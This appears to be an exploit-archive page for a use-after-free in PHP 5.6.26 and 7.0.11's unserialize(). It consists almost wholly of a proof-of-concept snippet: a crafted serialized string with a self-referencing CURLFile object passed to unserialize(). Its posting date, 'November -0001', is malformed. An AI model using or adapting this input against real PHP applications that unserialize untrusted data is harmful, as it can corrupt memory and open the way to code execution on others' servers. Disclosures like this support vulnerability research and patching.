Home / exploits PHP 5.6.26 and 7.0.11 Use After Free in unserialize
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP 5.6.26 and 7.0.11 Use After Free in unserialize()</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>PoC: <?php $poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}'; unserialize($poc); ?> </BODY></HTML>